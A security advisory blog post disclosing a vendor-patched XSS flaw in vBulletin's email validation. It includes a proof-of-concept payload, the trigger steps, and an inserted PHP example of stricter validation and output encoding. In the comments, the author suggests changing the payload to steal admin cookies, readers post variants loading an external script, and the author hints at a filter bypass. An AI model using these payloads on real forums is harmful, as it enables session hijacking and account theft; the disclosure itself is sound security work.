
imei Addmimistrator’s BugBlog

imei’s security Advisories and researches

——–Summary——–
Software: vBulletin
Software’s Web Site: http://www.vBulletin.com
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Medium
——-Description——-
vBulletin versions 3.0.12 and 3.5.3, a powerful and widely used forum package, contain a security bug that allows an attacker to perform an XSS attack. The bug results from not sanitizing quotation marks and the < and > characters in the “email” field of a user’s profile information. Its source is a weak regular expression for email validation that allows invalid characters to be inserted in the domain-name section of the address; in addition, the output value in the sendmsg.php file is not passed through htmlspecialchars, which makes the bug exploitable. A successful attack can result in cookie theft, page hijacking, etc.
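An added example, not vBulletin's code: the function names and the permissive pattern below are hypothetical stand-ins for the two defects described above (a validator that lets quotes and angle brackets into the domain part, and output written without htmlspecialchars), shown beside a stricter check and an encoded output. The second sample is the value from the Exploit section, assumed to use straight quotes.

```php
<?php
// Added illustration, not vBulletin source. Function names and the
// permissive pattern are hypothetical stand-ins for the flaw described.

// Weak check: any run of characters without whitespace or '@' is accepted
// as the domain part, so quotes and angle brackets pass validation.
function weak_is_valid_email(string $email): bool
{
    return preg_match('/^[^@\s]+@[^@\s]+\.[a-z]{2,}$/i', $email) === 1;
}

// Stricter check: PHP's built-in validator plus an explicit allow-list
// for the domain labels (letters, digits, inner hyphens only).
function strict_is_valid_email(string $email): bool
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $domain = substr($email, strrpos($email, '@') + 1);
    $label  = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return preg_match('/^(?:' . $label . '\.)+[a-z]{2,63}$/i', $domain) === 1;
}

// Output encoding: needed wherever the stored value is written into HTML,
// independently of how strict the input validation is.
function render_email_link(string $email): string
{
    $safe = htmlspecialchars($email, ENT_QUOTES, 'UTF-8');
    return '<a href="mailto:' . $safe . '">' . $safe . '</a>';
}

// Constructed sample inputs (second one taken from the Exploit section).
$samples = [
    'user@example.com',
    'imei@myimei.com"><script>alert(1)</script>.nomatt',
];

foreach ($samples as $s) {
    printf("%s\n  weak=%s strict=%s\n  rendered: %s\n",
        $s,
        var_export(weak_is_valid_email($s), true),
        var_export(strict_is_valid_email($s), true),
        render_email_link($s));
}
```

The weak pattern accepts both samples while the strict check accepts only the first; the rendered output keeps the markup inert even for a value that was stored before validation was tightened.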
——-Conditions——-
The admin settings must be as follows:
Enable Email features=Yes
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins/options.php?do=options&dogroup=email
These conditions appear to be met by default.
——-Exploit——-
Scenario:
/forum/profile.php?do=editpassword
pass:your pass
email: imei@myimei.com”><script>alert(1)</script>.nomatt
Note about length limitation ;)
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&u={your id}
——-Solution——-
Upgrade to the vendor-provided patch.
——-Credit——-
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
myimei.com/security

20 Responses to “vBulletin3.0.12&3.5.3~is_valid_email()~XSS Attack”

    baba inkaare!!!!!

    How can we do it? How can we hack a site this way?

    Does your target forum meet the above-mentioned conditions?
    If yes, enter the exp text as your email and send a link to sendmsg.php to the admins. You should alter that text to send his cookies to your script.
    I am sorry about more details. We don't wanna TEACH hacking.
    However, there are many documents about XSS hacking.
    regs
    imei

    How can I close that bug??

    reg

    jeme

    Upgrade plz. vB provides a patch for this bug. (I worked in concert with them and didn't publish this before making the vendor aware.) 3.0.13 is the patched version for 3.0.12, and 3.5.4 is the safe version for those who have version 3.5.3.
    be beauty.
    imei

    If you really can hack vBulletin version 3.5.3 then I'll give you money :) Just contact me and we will have a deal :)

    Dear Emad.
    It is a website for going to a SeQre world~ not a “How to hack” one. I don't need to show whether I can or cannot hack a vBulletin system. What I needed is what I got! Security sites, and also vbulletin.com itself, verified this bug and all things are OK!
    btw if you’d like to learn XSS I can help you;) :)

    http://www.securityfocus.com/bid/16919

    More serious code than alert(1) cannot be typed due to length limitation (50). I even cannot call this bug “vulnerability”.

    Exploiting a bug is another science in comparison with finding a bug. Security bugs do not need to have a clear exploit to be called a “vulnerability”.
    BTW I didn't want to spend more time on a patched and accepted bug, but you as an interested person may like to work on this one!

    i{at}ii.ii”><script src=”aaa.aa/a.js”></script>.no

    2IMEI: spaces are not allowed, this e-mail will be erroneous.

    i{at}ii.ii”><script”"src=”aaa.aa/a.js”></script>.no

    What about this dear?

    Nothing. %20 not allowed, %a0 allowed but doesn’t work, ”” also allowed but doesn’t work.

    Work on it, Trasser. There are some tricks about XSS; I'll show you one of them. As an ultimate solution I offer you: don't close the <a tag that shows the mail link. After that you can inject events without a space separator ;))
    regs

    Man, thanks for this one. Can I know where you are from?

    Yes Sir. It is my About Me ;)
    http://myimei.com/security/about-me/

    can i have the best exploit plz ??

    Hai Friends,

    vBulletin is one of the best software on the market today for all medium-to-large sites which allows attacker to perform a XSS attack as well as vulnerability in vBulletin 3.0 can be exploited by people to conduct SQL injection attacks.

    Thanks,
    http://www.seoblogcentral.com

    seoblogcentral - vbulletin,jelsoft,forum,bbs,discussion,bulletin board,message board,blog,discussion forum
